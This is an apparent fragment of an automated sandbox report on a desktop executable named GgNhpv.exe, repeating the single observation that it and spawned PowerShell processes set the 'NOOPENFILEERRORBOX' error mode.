Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX</